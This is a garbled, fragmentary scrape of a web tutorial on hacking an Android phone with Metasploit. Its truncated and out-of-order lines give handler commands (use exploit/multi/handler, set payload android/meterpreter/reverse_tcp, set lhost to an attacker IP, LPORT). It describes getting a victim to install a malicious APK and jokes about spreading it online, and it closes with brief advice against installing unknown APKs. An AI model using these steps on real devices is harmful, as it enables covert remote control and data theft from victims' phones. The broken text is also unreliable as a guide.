Beruflich Dokumente
Kultur Dokumente
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed t
Hacking Android Smartphone Tutorial using Metasploit
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker m
Hacking Android Smartphone Tutorial using Metasploit
Info:
use exploit/multi/handler > we will use Metasploit handler
set payload android/meterpreter/reverse_tcp > make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in st
Hacking Android Smartphone Tutorial using Metasploit
Info:
set lhost 192.168.8.94 > attacker IP address
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim ope
Hacking Android Smartphone Tutorial using Metasploit
7. It's mean that attacker already inside the victim android smartphone and he can do everything with
Hacking Android Smartphone Tutorial using Metasploit
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial u
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine
Hacking Android Smartphone Tutorial using Metasploit
shortcut.
LPORT=<port_to_receive_connection>
nnect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the por
n't need to describe how to distribute this file, internet is the good place for distribution :-) ).
install it. After victim open the application, attacker Metasploit console get something like this:
view, read and examine the source code. The picture below is the source code of our malicious APK's in this tut
oid-smartphone-tutorial-using-metasploit/#sthash.EO4noWOy.dpuf
ng connections to the port already specified above. Type msfconsole to go to Metasploit console.
console.